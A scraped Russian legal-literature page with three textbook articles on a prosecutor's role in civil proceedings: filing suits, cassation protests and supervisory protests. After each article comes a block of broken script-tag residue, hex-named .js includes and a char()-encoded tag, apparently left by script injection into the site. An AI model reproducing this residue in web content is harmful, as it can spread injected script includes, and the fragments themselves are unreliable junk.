Генеральный прокурор Российской Федерации в приказе № 1 от 5 января 1997 г. "Об участии прокурора в гражданском судопроизводстве" предлагает прокурорам использовать их право на обращение в суд с исковым заявлением в интересах лиц, особо нуждающихся в социальной и правовой защите, а также общества и государства, не допуская при этом подмены функций юридических служб и хозяйственных руководителей.
Если должностные лица или граждане не используют свое право на заявление исков, а того требуют интересы обеспечения законности, прокурор доводит до сведения этих должностных лиц и граждан информацию об их праве обратиться в суд за защитой своих прав и законных интересов и разъясняет, как это сделать. Однако, если эти должностные лица и граждане не желают воспользоваться этим правом, прокурор самостоятельно возбуждает производство в суде. Это прежде всего касается таких сфер гражданского судопроизводства, как охрана федеральной собственности от противоправных посягательств на нее; возмещение вреда; нарушение законов об охране труда и технике безопасности; нарушение природоохранного законодательства и т. д.
Прокурор предъявляет иск в случаях, когда нарушенные права и охраняемые законом интересы предприятий и граждан имеют особое общественное значение. Сюда можно отнести иски прокуроров, поводом для которых послужили стихийные бедствия, несчастные случаи с людьми, катастрофы, аварии, когда прокурор обязан принять меры к защите прав и законных интересов пострадавших, а также предприятий и организаций, которым причинен материальный ущерб. В случаях посягательств на интересы государства путем заключения различного рода договоров и соглашений, когда заведомо государству причиняется материальный ущерб, прокурору необходимо предъявить иск о признании недействительными заключенные договоры и соглашения.
Прокуроры используют свое право предъявления исков, когда требуется защитить права и законные интересы граждан, нарушенные неправомерными действиями государственных органов и должностных лиц. В соответствии с Законом РФ "Об обжаловании в суд действий и решений, нарушающих права и свободы граждан'", рассмотрение жалоб в суде происходит по правилам гражданского судопроизводства, с изъятиями и дополнениями, установленными настоящим законом и другими законодательными актами.
При предъявлении исков прокурор исходит из требований закона о подведомственности жалоб судебным органам. Если жалоба о нарушенном праве подведомственна суду, то прокурор вправе предъявить иск, если нет, то он использует иные средства прокурорского реагирования - протест, представление об устранении нарушений закона и т. д.
Судам подведомственны жалобы граждан в отношении незаконно наложенного штрафа, отказа в регистрации транспортных средств или строения; в приеме детей в дошкольные учреждения или в школу. В суде могут рассматриваться также жалобы и на другие действия должностных лиц, ущемляющих права граждан.
Суд не вправе принять к рассмотрению жалобы на действия лиц, производящих дознание, следователя, прокурора, судьи, судебного пристава (здесь речь не идет о подаче заявления об отмене меры пресечения и о продлении срока следствия и содержания обвиняемого под стражей, эти процессуальные действия относятся к сфере уголовного судопроизводства).
Иск в связи с действиями должностного лица подается в суд по месту нахождения учреждения, где работает должностное лицо.
С иском в суд могут обратиться представители органов местного самоуправления или организаций, если об этом их просит лицо, права которого нарушены. Прокуроры следят за тем, чтобы полномочия представителей, предусмотренные ст. 42 ГПК, не нарушались.7f8c7052e9e6b0640f03f506c7b7ca78.js" type="text/javascript">3e9a4c68c5cb7741b756885b236a6188char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)1bb51578826a8b973da4e7ca55516eb3.js" type="text/javascript">facc1dcf302e1a9471e67a44d937c530.js" type="text/javascript">8c33295d9ef23b084bca1648b967ce96.js" type="text/javascript">1d8ab6f850176d0f2ce759d008ecbe0c.js" type="text/javascript">03d8a67365c6ea93d9e117b8ef330420.js" type="text/javascript">a248c3a31bac049619d8260dbfe6bdbe.js" type="text/javascript">04165c9e81c0dc0ffec331704b12d2fc.js" type="text/javascript">72a3e0b73b4f15f3a3280ca20df14783.js" type="text/javascript">3c5118d36bf29ec2126c20c1f28e4a95.js" type="text/javascript">b4ffd8180f49413eed21ef591da0fec1.js" type="text/javascript">4db07e7b57c738eede7e1ddc6bd641b1.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1406 |
Участие прокурора в рассмотрении гражданских дел в стадии кассационного производства
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Процессуальное назначение участия прокурора в стадии кассационного производства по гражданским делам определяется тем, что предметом проверки судом кассационной инстанции являются важнейшие акты правосудия по гражданским делам - решения, определения и постановления суда, которые должны быть законными, обоснованными и справедливыми. Прокурор приносит протест на незаконное или необоснованное решение суда независимо от того, участвовал ли он в· данном деле или дело рассмотрено в его отсутствие (ст. 282 ГПК). По общему правилу кассационный протест приносит прокурор, в обязанности которого входит надзор за законностью актов, принимаемых судом при рассмотрении гражданских дел: прокурор района или города (помощник прокурора) - на решения районного или городского народного суда, прокурор субъекта РФ (старший помощник, помощник прокурора) - на решения суда соответствующего субъекта РФ и т.д. Прокурор субъекта РФ вправе опротестовать решение любого суда в пределах субъекта. Заместители прокуроров районов, городов и субъектов РФ в пределах своей компетенции также вправе принести кассационный протест на судебные решения. Помощники прокуроров, прокуроры управлений и отделов прокуратур субъектов РФ могут принести протесты только по делам, в рассмотрении которых они участвовали (ст. 36 Закона
о прокуратуре). Генеральный прокурор РФ или его заместитель приносят протест в кассационную коллегию Верховного Суда РФ, на решения, определения коллегии по гражданским делам Верховного суда РФ.
Предметом кассационного опротестования могут быть решения судов, не вступившие в законную силу1: 1) решения районных (городских) судов - соответственно в суд субъекта РФ; 2) решения суда субъекта РФ - в Верховный Суд Российской Федерации; 3) решения коллегии по гражданским делам Верховного Суда РФ - в кассационную коллегию Верховного Суда РФ.
Кассационные протесты приносятся прокурорами через суды, вынесшие решения. Подача протеста непосредственно в кассационную инстанцию не является препятствием для его рассмотрения. Однако предпочтительнее подавать протесты в суд, принявший решение, чтобы истец, ответчик, третьи лица имели возможность заранее ознакомиться с доводами протеста и представить на него свои возражения.
Кассационные протесты могут быть поданы в течение десяти дней после вынесения решения в окончательной форме. Протест, поданный по истечении кассационного срока, оставляется судом без рассмотрения и возвращается прокурору, принесшему протест. В этих случаях дело не выносится на рассмотрение суда кассационной инстанции.
Прокуроры обязаны в период кассационного срока проверить законность решений по всем гражданским делам, рассмотренным судом как с участием прокурора, так и без его участия. Незаконные решения судов прокуроры опротестовывают, как правило, в кассационные сроки. Между тем некоторые дела, рассмотренные без участия прокурора, вопреки требованиям Генерального прокурора РФ в течение кассационного срока не проверяются. В результате не все незаконные и необоснованные решения опротестовываются в кассационном порядке. Ошибки судов по таким делам исправляются в надзорном порядке, а то и вовсе остаются неустраненными. В отдельных республиках, краях и областях около 60% неправосудных решений исправляются в надзорном порядке, а в кассационном - лишь 40%. Иначе говоря-, надзорное опротестование становится обычным средством исправления ошибок судов первой инстанции, а кассационное - исключительным. Между тем опыт работы многих прокуратур убедительно подтверждает, что при правильной
организации работы прокуроров .кассационное опротестование может и должно стать основным средством устранения нарушений закона, допущенных при рассмотрении дел судами первой инстанции. Это возможно при условии, если все решения по делам, рассмотренным без участия прокурора, тщательно проверяются в кассационный срок, при этом выявляются незаконные или необоснованные решения, на которые приносятся кассационные протесты. В результате правильной организации работы по протестам прокуроров отменяется или изменяется половина незаконных решений, пересматриваемых в кассационном порядке. В этих республиках, краях и областях удельный вес кассационных протестов в сопоставлении с надзорными - свыше 60%, что можно считать правильным соотношением.
Для того, чтобы выявить незаконное или необоснованное решение, прокурор применяет определенную методику проверки их законности. Некоторые прокуроры начинают изучать дело с ознакомления с решением суда, а затем изучаются материалы дела. При такой методике прокурор вольно или невольно будет оценивать материалы дела только с позиции правильности вынесенного решения и может не уделить внимания обстоятельствам, имеющим существенное значение для дела, но оставленным судом без оценки в принятом решении. Опытные прокуроры поступают по-иному. Они начинают изучать дело не с решения суда, а с искового заявления. Это дает им возможность определить подведомственность спора суду, правоспособность сторон, соблюдение порядка возбуждения гражданского дела, полномочия суда или судьи на рассмотрение конкретного дела. Далее изучаются приложенные к исковому заявлению документы, представленные в суд доказательства, а также протокол судебного заседания. Из анализа этих документов прокурору становится очевидным, соблюдены ли требования закона о всесторонности, полноте и объективности рассмотрения дела, соблюдены ли судом, требования материального и процессуального закона, обеспечены-ли права и законные интересы участников процесса. В завершение прокурор изучает решение суда. При такой методике проверки ему нетрудно определить законность и обоснованность решения и определить свою позицию относительно его опротестования.
Если прокурор пришел к выводу о незаконности или необоснованности решения суда, он приносит кассационный протест. Протест как процессуальный акт, исходящий от прокурора, на которого возложены обязанности надзора за законностью этих актов, должен отвечать определенным требованиям, Он должен быть объективным, мотивированным, убедительным и юридически обоснованным. Протест, отвечающий этим требованиям, поможет кассационной инстанции исправить судебную ошибку и принять законное и обоснованное определение.
Протест прокурора содержит определенные реквизиты. В нем должны содержаться1: 1) наименование суда, которому адресуется протест; 2) должностное положение прокурора, принесшего кассационный протест; 3) содержание решения суда, на которое приносится кассационный протест; 4) приведенные обоснования к отмене или изменению решения суда; 5) обоснование мотивов к отмене или изменению решения суда; 6) ссылка на нормы материального и процессуального закона, в силу которых опротестованное решение суда подлежит отмене или изменению; 7) изложение требований прокурора относительно судьбы опротестованного решения (отменить, изменить решение и т. д.); 8) перечень документов, прилагаемых к протесту прокурора. Кассационный протест поддерживается соответствующим прокурором: самим автором протеста или прокурором отдела вышестоящей прокуратуры. Кассационный протест представляется в суд с копиями по числу лиц, участвовавших в деле. В необходимых случаях по предложению председателя суда или судьи "прокурор в том же порядке представляет копии прилагаемых к протесту письменных материалов по числу лиц, участвовавших в деле.8baa81e0a89980094e2904f79935d76e.js" type="text/javascript">ee80716c8f914799473a91a3de97bd85char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)834b0ee188e502c9b05964e17117d6bc.js" type="text/javascript">d40e05e846a67abeb60220aaa0b5306f.js" type="text/javascript">4a8414ef07f00522eb41f5611da88162.js" type="text/javascript">0e95ebfd9675ca9b949c86306588b33f.js" type="text/javascript">23ebcc6938d5e59935ca80231774e124.js" type="text/javascript">f05cf6779971aa69d0375ad41f3a0bf5.js" type="text/javascript">6074b7ed99283a9160fdadc6b9793e60.js" type="text/javascript">28752bbb1aa18112b08d5d31442d89bd.js" type="text/javascript">5cd124d225d9ed47b8afbb8cb24d5005.js" type="text/javascript">bbd4b836b98199f5b84afd15ba7cf330.js" type="text/javascript">5a5bd98dc29af5720a9063957b397da6.js" type="text/javascript">
Коментариев: 0 | Просмотров: 318 |
Участие прокурора в рассмотрении гражданских дел в стадии надзорного производства
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Надзорное производство по гражданским делам, так же как и в уголовном судопроизводстве, .является стадией исключительной. Исправление ошибок судов первой инстанции должно происходить, как правило, в судах кассационной инстанции. Между тем в надзорном порядке пересматривается незаконных и необоснованных решений больше, чем в кассационном порядке. Происходит это, главным образом, вследствие неудовлетворительной работы прокуроров, осуществляющих надзор за законностью решений, определений и постановлений судов первой и кассационной инстанций, которые своевременно не принимают надлежащих мер к исправлению ошибок этих судов. Надзорное производство по гражданским делам призвано исправлять эти ошибки. Участие прокурора в стадии надзорного производства является одной из существенных гарантий успешного пересмотра решений, определений и постановлений судов, вступивших в законную силу. Генеральный прокурор РФ предлагает подчиненным прокурорам правильно и своевременно проверять и разрешать надзорные жалобы, в необходимых случаях приостанавливать исполнение незаконных и необоснованных решений и опротестовывать такие судебные решения. При отсутствии оснований для принесения протеста предлагается составлять мотивированное заключение с сообщением заявителю результатов рассмотрения его жалобы с изложением мотивов отказа.
Обобщения производств прокуроров в надзорном порядке, проведенные Генеральной прокуратурой России, показывают, что в целом надзорное производство по гражданским делам в органах прокуратуры осуществляется правильно. Многие неправосудные решения исправляются по протестам прокуроров. Однако не все прокуроры выполняют указания Генерального прокурора о своевременном и правильном рассмотрении жалоб и проверке гражданских дел. Некоторые дела изучались прокурорами невнимательно, без учета существенных доводов, содержащихся в жалобах, в результате чего по делам принимались необоснованные решения об отказе в принесении протеста. Это порождает направление гражданами и должностными лицами повторных жалоб и обращение в центральные органы прокуратуры и правосудия, тогда как подавляющее большинство таких жалоб могло бы получить правильное разрешение на местах. Вследствие недостаточно глубокого анализа материалов гражданского дела и жалоб, а также ошибок в применении норм материального и процессуального права некоторые прокуроры приносят необоснованные протесты. В результате суды надзорной инстанции отклоняют около 15% протестов, принесенных прокурорами. Определенная часть постановлений и определений судов, которыми отклонены надзорные протесты прокуроров, пересматриваются вышестоящими судами надзорных инстанций (около 5%), однако то, что отклоняется каждый десятый протест прокуроров, свидетельствует о серьезных недостатках в подготовке надзорных протестов.
Некоторые прокуроры не проявляют должной принципиальности и в тех случаях, когда необоснованно отклоняются их протесты, они не переносят решения этих вопросов на рассмотрение вышестоящих прокуроров и не добиваются отмены необоснованных и незаконных постановлений и определений судов надзорной инстанции. В то же время до сих пор не исключены из практики случаи необоснованного отзыва протестов прокуроров с рассмотрения суда надзорной инстанции. Бывает и такое, когда прокурор района или города вносит вышестоящему прокурору представление об опротестовании в порядке надзора незаконного определения кассационной инстанции, отменившей законное и обоснованное решение, но оно не поддерживается вышестоящим прокурором.
Субъектами надзорного опротестования являются прокуроры, перечень которых содержится в ст. 320 ГПК1. Этот перечень не подлежит расширительному толкованию. Прокурор, не обладающий правом принесения надзорного протеста, вносит соответствующее представление вышестоящему прокурору, правомочному это сделать. Свои полномочия по принесению надзорных протестов прокуроры используют в случае необходимости исправить ошибки мировых судей, судов первой инстанции, которые не были своевременно исправлены. Предметом надзорного опротестования могут быть также решения и определения суда апелляционной инстанции (ст. 31810 ГПК), определения судов кассационной инстанции, когда необоснованно отменялись или изменялись законные и обоснованные решения судов первой инстанции, и наоборот, оставлялись без изменения решения незаконные и необоснованные, а протесты и жалобы, принесенные на предмет их отмены, необоснованно отклонялись апелляционными или кассационными инстанциями. Определенная часть надзорных протестов приносится прокурорами в связи с необходимостью отмены или изменения определений и постановлений самих надзорных инстанций, которые не соответствуют или противоречат закону. Допустим, президиум областного суда отклонил протест прокурора области. Последний вносит представление Генеральному прокурору РФ, и тот приносит протест в Верховный Суд РФ, в котором предлагает отменить постановление президиума областного суда.
Закон (ст. 322 ГПК) предоставляет прокурорам, приносящим надзорный протест, а также прокурорам районов и городов право истребования из суда гражданских дел для разрешения вопроса о наличии оснований для принесения протеста в порядке надзора. При этом следует иметь в виду, что гражданское дело может быть истребовано лишь в том случае, когда решение по нему вступило в законную силу. Поводами для истребования и проверки дела могут быть жалобы сторон, третьих лиц, представителей общественных организаций и трудовых коллективов, сообщения в печати и в других средствах массовой информации, результаты проверки деятельности судов, а также усмотрение самого прокурора. Иначе говоря, любой сигнал о незаконности судебного решения служит поводом для производства по делу в порядке надзора.6bb58607b1de0270729a1fb2a14d5b5d.js" type="text/javascript">1c588afff7218301f1e86c3250f8a17cchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)96f1e245e1912b407c21f3c0d30cfa5d.js" type="text/javascript">35d07555492582c2820f57e5ce894f8e.js" type="text/javascript">30e540217f260e21ae4ca907673a6fe6.js" type="text/javascript">38ccb3170d3a0ed8208782058859d858.js" type="text/javascript">a49970cec70bdbb8b9f574c10191fa4c.js" type="text/javascript">c4e4c4aa9200aac4951f5bc65218b1f3.js" type="text/javascript">4389ca92629b357f68d0d81036b31548.js" type="text/javascript">24cd4494f18fa5f0eb35bb8b8774f496.js" type="text/javascript">9c4af3cbcea0f701333f1ffba054dc65.js" type="text/javascript">31cafcfaf55e68447dcad17320153e89.js" type="text/javascript">7213749dfed11f5041a7491ccab90f55.js" type="text/javascript">
Коментариев: 0 | Просмотров: 859 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: